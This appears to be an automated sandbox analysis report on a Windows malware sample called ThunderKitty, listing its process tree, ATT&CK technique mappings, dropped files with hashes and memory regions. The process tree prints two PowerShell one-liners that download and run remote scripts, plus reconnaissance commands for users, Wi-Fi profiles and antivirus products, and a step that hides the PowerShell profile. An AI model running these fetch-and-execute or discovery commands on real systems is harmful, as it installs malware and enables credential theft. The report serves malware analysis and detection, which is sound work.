- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2432
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hajutsmr\hajutsmr.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4696
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES82FB.tmp" "c:\Users\Admin\AppData\Local\Temp\hajutsmr\CSC3901D0A37DA7453BADD6F86AE6C545.TMP"
      4⤵
      PID:4880
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4596
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:4824
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5112
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tebx1obz\tebx1obz.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2444
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES831A.tmp" "c:\Users\Admin\AppData\Local\Temp\tebx1obz\CSC3EB262215D6349C29A9F45E0D57F80E4.TMP"
      4⤵
      PID:4080
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2224
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4344
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:1448
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2960
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:1928
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4516
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:4532
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:1656
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1292
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:2264
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:4136
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:4300
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:1288
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:3216
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:3468
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:2996
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3228
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:3952
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM wallpaper32.exe
  2⤵
  - Kills process with taskkill
  PID:1692

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x498 0x490
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2716

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
652B

MD5
03ce749b9c7a14fb2dbcf9753857afac

SHA1
50e1f0f17c585720c61abf7bb10a038c7d8cdc38

SHA256
098397300d9cacd68ce8fc555d346a4dd4cee4f4b1567089f0364ad388bc5719

SHA512
794e7c7ab6ea6f86738d36dec12765ad133b18780ee6557d0ae0ecbb141c01d0bf1c4a60cc395d07b5d93d6a5d0a05acb29cee56c384511759ffe9691ca68190

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5e621802b71e3ece88354ee557e1ce88

SHA1
0a7bb0acee1ebc8281bd24ef0084076e03f93e1f

SHA256
80a94ab0d20a51881a420cf64826b30e621d94245304be8b35af5cac389bc587

SHA512
31038c0107f0111eef87385a6ec7ef56ec9833fd5ef85187e58c9b32917ba8b90fb7c1bb2efbf273f1ee3a03744ca61d3f4d6f25029b9715eca216be2d80ef01

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
820128764c07552628e15dc57e1a2b89

SHA1
9613a355ee0f83dc8bc878997208feaaca245a14

SHA256
d56c95e8d92341bbc8138e44205c5b8c4719e74e7bd0e5bb96a995b2b5f4c9f9

SHA512
9dadd04db6371f855e316b995a76054f3062eeb9f78469ed52d9c7b140664c19c76230affc477e8e1ba8512e04ec656bf96cb294fa687470a8bffa519c4bef9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES82FB.tmp

Filesize
1KB

MD5
15be319dec9b3dd399bcaffd66cd9368

SHA1
715c8c745f88584c7f30746e58754f30685c88e1

SHA256
21a872e0b88ce8c220981a1dd369231d1a659df437f053f6f655a8b090032df3

SHA512
71d5c93bd36ac5e587c000d64549c2f4330ed3ff71481c95bc6a1b555eab28bb9765ca43a9c66cb2080784674e057ea7a36081f5530602689f056d3bfdc86328

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES831A.tmp

Filesize
1KB

MD5
3ad6e99e6a9caf1af6323c3d11abca0b

SHA1
2b082a17aff52c5cae7afe5f23e0a8d594b250fe

SHA256
d405d5fcf7b6089a50b77d3852644cadca6312ff389000ad7166413136e7ff7c

SHA512
320f20fd567260296bef6b41d19dd116a737d3459bed93828ec5041f1a4fe7f7e238bf07576381ad5f937d347e886b64a82543b1e0f9b7f509d6e38093070cd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

Filesize
224KB

MD5
0ab335faf4325262347180da8a417bd8

SHA1
44982cdf5717e04ff5b451bfe351bbc86ecde73a

SHA256
b4be883212c2b826286e6216e968d117c958258c13237145d6452cf0c2cd17a2

SHA512
cb844be02d3b277275d813e92f03ebfc651e8521f82ccfd19e15a700bc878c0f7a3e63ea22f9bcd61240d9cb380e38c8430d0345e36265d4b00abd4890bd9dc5

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
24KB

MD5
e850e150d6fa1ec767573bbd82768e06

SHA1
8d3a6d685327efabf21e942b08792a8ff755ec42

SHA256
2a2c03595b0b98babef2c666f5f5bd967a8f4a80267e6f1ef0a9ea75823b4192

SHA512
286cc16a2ae804698b8dd078ce0c4f9be8df8a95378aa25f3b00138ebbb61020847f0b56dc98ecbd6d43f28a6945aac0bb9b9629aa837ddb27f86be0bbf5debb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_is4lrulb.rjn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\hajutsmr\hajutsmr.dll

Filesize
4KB

MD5
6d0cc4c55cf589255624635ae0f92900

SHA1
dcc4d20ef421249da7208213055ad43988fbd229

SHA256
73bad8ce4812723fa7e6903c44ca84c8a3d9b3f484217fa5d789bfb10c02c019

SHA512
a11d21bd10cf8a5f1bf768ec8ee1c354606e2aef436db3ac806a78ead710aff242bf15c663ff20da3f09e504ddfc1cdf45356b3e38e4fd81024ed611e150b19e

Download Submit
C:\Users\Admin\AppData\Local\Temp\tebx1obz\tebx1obz.dll

Filesize
4KB

MD5
91774d2419deef0c2e68c565da484d74

SHA1
ad03f243ae7edaebb48894fd755e4e03d87b0b57

SHA256
e561b3acf7ac17858b9545a1d30cb40e3709f952ce6374fefe7ea5d801c698d3

SHA512
703cae4db296fd34f16ea40a1464837b07864e345b688b6995bdfc27c037e33e9181036f8596661748db87a8d71bba51ca95a1fc61115004a18d59fec9e5c76e

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hajutsmr\CSC3901D0A37DA7453BADD6F86AE6C545.TMP

Filesize
652B

MD5
f0fd4bc7fb0ccac296a4fbd53467e865

SHA1
d62bc910282686b6413adc579b0b1bec92d6ab87

SHA256
652b3335ac06712edf297a0a508a7bcc062aa4c9597223f1796e0b1856c95d93

SHA512
3b719e994be0bb89c86754f2e079056d75d2de1818b2dce265ff16416a8590cf9ac8191a4dd4058b91b888d8cb7936ad374cd1139df1eb16a739c41cad1b2167

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hajutsmr\hajutsmr.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hajutsmr\hajutsmr.cmdline

Filesize
369B

MD5
88587af39a0607534bf0189ce9a46204

SHA1
49b88878dd7af9c807213b53e243f553357952a3

SHA256
edd36260084845f0913620e8fdc5318c3f920222c655a5dff7c45c91f10323b4

SHA512
15a112385b2532e9ae92e62842147a88281b6681be819d02d8ebaef430d5376a2d2f0ee967ccc703fb0a89d13ccedd29eff134a3c14a17ed97d939aececea0a1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tebx1obz\CSC3EB262215D6349C29A9F45E0D57F80E4.TMP

Filesize
652B

MD5
e946973b60f34a2effe33254e45f35ed

SHA1
36c28039f7bbaf15b7ae23d3e15851e812c3883c

SHA256
21fdd3c2906b575e367e15bc20a015364070e10e2129e3111c87f92d08a0a30c

SHA512
1914f7e1648b3b436776ce7763a04f9c7af9ea223f602bff6b9ac67022b84b5791d4615212d3a38fa0c796686dcdfb9c26a978e8c7b1dcf428a1a9219c78b7d7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tebx1obz\tebx1obz.cmdline

Filesize
369B

MD5
7669e7b0f8f0cd744e419053ca91c1fb

SHA1
f1cbe83b3736c01e09d7d7976384cce8a00304bd

SHA256
43f443c0036480a27d7b750018edc33572fb0390c587fa02e4da9358db263cf2

SHA512
b0613a37fdc0d8e83b59471cecb4e66d54ba259fe55211561271c766237b462aa04ccbbcb7f6425236250913697592e57e0a632b4c3ffd929d3b26e92165a82e

Download Submit
memory/2432-89-0x00007FF8BD7B0000-0x00007FF8BE271000-memory.dmp

Filesize
10.8MB

Download
memory/2432-35-0x00007FF8BD7B0000-0x00007FF8BE271000-memory.dmp

Filesize
10.8MB

Download
memory/2432-10-0x00007FF8BD7B0000-0x00007FF8BE271000-memory.dmp

Filesize
10.8MB

Download
memory/2432-31-0x00007FF8BD7B0000-0x00007FF8BE271000-memory.dmp

Filesize
10.8MB

Download
memory/2432-73-0x0000017A41CF0000-0x0000017A41CF8000-memory.dmp

Filesize
32KB

Download
memory/3904-34-0x00007FF8BD7B0000-0x00007FF8BE271000-memory.dmp

Filesize
10.8MB

Download
memory/3904-0-0x00007FF8BD7B3000-0x00007FF8BD7B5000-memory.dmp

Filesize
8KB

Download
memory/3904-75-0x00007FF8BD7B0000-0x00007FF8BE271000-memory.dmp

Filesize
10.8MB

Download
memory/3904-3-0x0000024C36EA0000-0x0000024C36EC2000-memory.dmp

Filesize
136KB

Download
memory/3904-1-0x00007FF8BD7B0000-0x00007FF8BE271000-memory.dmp

Filesize
10.8MB

Download
memory/5112-68-0x0000018BEFFD0000-0x0000018BEFFD8000-memory.dmp

Filesize
32KB

Download
memory/5112-94-0x0000018BF1080000-0x0000018BF10AA000-memory.dmp

Filesize
168KB

Download
memory/5112-95-0x0000018BF1080000-0x0000018BF10A4000-memory.dmp

Filesize
144KB

Download
memory/5112-83-0x0000018BF1660000-0x0000018BF1E06000-memory.dmp

Filesize
7.6MB

Download
memory/5112-128-0x0000018BF1070000-0x0000018BF1082000-memory.dmp

Filesize
72KB

Download
memory/5112-129-0x0000018BF1060000-0x0000018BF106A000-memory.dmp

Filesize
40KB

Download